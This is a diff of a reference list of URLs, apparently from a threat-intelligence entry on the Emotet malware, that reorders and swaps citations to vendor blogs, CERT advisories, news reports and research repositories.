- "https://www.jpcert.or.jp/english/at/2019/at190044.html",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet",
- "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
- "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
- "https://isc.sans.edu/diary/rss/28254",
- "https://www.youtube.com/watch?v=8PHCZdpNKrw",
- "https://www.youtube.com/watch?v=q8of74upT_g",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
- "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
- "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://community.riskiq.com/article/2cd1c003",
- "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
- "https://cyber.wtf/2021/11/15/guess-whos-back/",
- "https://blogs.cisco.com/security/emotet-is-back",
- "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
- "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection",
- "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.youtube.com/watch?v=AkZ5TYBqcU4",
- "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://twitter.com/Cryptolaemus1/status/1516535343281025032",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/",
- "https://pl-v.github.io/plv/posts/Emotet-unpacking/",
- "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/",
- "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
- "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
- "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
- "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
- "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html",
- "https://unit42.paloaltonetworks.com/c2-traffic/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet",
- "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
- "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
- "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html",
- "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
- "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
- "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
- "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents",
- "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware",
+ "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html",
"https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return",
- "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
- "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
- "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
- "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
- "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf",
+ "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/",
+ "https://www.esentire.com/security-advisories/emotet-activity-identified",
+ "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
+ "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
+ "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html",
+ "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
+ "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-201A",
+ "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
+ "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
+ "https://github.com/d00rt/emotet_research",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
+ "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/",
+ "https://unit42.paloaltonetworks.com/emotet-command-and-control/",
+ "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
+ "https://blogs.cisco.com/security/emotet-is-back",
+ "https://blog.threatlab.info/malware-analysis-emotet-infection/",
+ "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates",
+ "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
+ "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
+ "https://pl-v.github.io/plv/posts/Emotet-unpacking/",
+ "https://intel471.com/blog/emotet-takedown-2021/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents",
+ "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
+ "https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
+ "https://github.com/cecio/EMOTET-2020-Reversing",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://securelist.com/the-chronicles-of-emotet/99660/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis",
+ "https://hatching.io/blog/powershell-analysis",
+ "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://twitter.com/raashidbhatt/status/1237853549200936960",
+ "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://unit42.paloaltonetworks.com/domain-parking/",
+ "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii",
+ "https://cyber.wtf/2021/11/15/guess-whos-back/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html",
"https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures",
"https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
- "https://muha2xmad.github.io/unpacking/emotet-part-1/",
- "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://github.com/d00rt/emotet_research",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612",
- "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
- "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
- "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis",
- "https://muha2xmad.github.io/unpacking/emotet-part-2/",
- "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
- "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
- "https://intel471.com/blog/emotet-takedown-2021/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
- "https://unit42.paloaltonetworks.com/emotet-command-and-control/",
- "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service",
- "https://twitter.com/milkr3am/status/1354459859912192002",
- "https://cyber.wtf/2022/03/23/what-the-packer/",
- "https://twitter.com/raashidbhatt/status/1237853549200936960",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://paste.cryptolaemus.com",
- "https://www.cert.pl/en/news/single/whats-up-emotet/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
- "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/",
- "https://blog.threatlab.info/malware-analysis-emotet-infection/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
- "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
- "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://github.com/mauronz/binja-emotet",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/",
- "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
- "https://www.youtube.com/watch?v=5_-oR_135ss",
- "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
- "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/",
- "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
- "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
- "https://www.atomicmatryoshka.com/post/malware-headliners-emotet",
- "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
- "https://isc.sans.edu/diary/rss/27036",
- "https://www.us-cert.gov/ncas/alerts/TA18-201A",
- "https://www.esentire.com/security-advisories/emotet-activity-identified",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html",
- "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
- "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/",
- "https://isc.sans.edu/diary/28044",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
- "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
- "http://ropgadget.com/posts/defensive_pcres.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/",
- "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
- "https://unit42.paloaltonetworks.com/domain-parking/",
- "https://www.bitsight.com/blog/emotet-smb-spreader-back",
"https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
- "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
- "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/",
- "https://hatching.io/blog/powershell-analysis",
- "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/",
- "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
- "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/",
- "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/",
+ "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/",
+ "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
+ "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html",
+ "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/",
+ "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet",
"https://persianov.net/emotet-malware-analysis-part-2",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.youtube.com/watch?v=5_-oR_135ss",
+ "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion",
+ "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
+ "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
+ "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/",
+ "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/",
+ "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
+ "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
+ "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/",
+ "https://muha2xmad.github.io/unpacking/emotet-part-1/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection",
+ "https://blog.talosintelligence.com/emotet-switches-to-onenote/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html",
+ "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de",
+ "https://www.youtube.com/watch?v=8PHCZdpNKrw",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
+ "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet",
+ "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/",
+ "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
+ "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
"https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://securelist.com/emotet-modules-and-recent-attacks/106290/",
+ "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure",
+ "https://twitter.com/eduardfir/status/1461856030292422659",
+ "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/",
+ "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/",
+ "https://persianov.net/emotet-malware-analysis-part-1",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://github.com/mauronz/binja-emotet",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://www.youtube.com/watch?v=AkZ5TYBqcU4",
+ "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://isc.sans.edu/diary/rss/28254",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction",
+ "https://twitter.com/Cryptolaemus1/status/1516535343281025032",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet",
+ "https://twitter.com/milkr3am/status/1354459859912192002",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
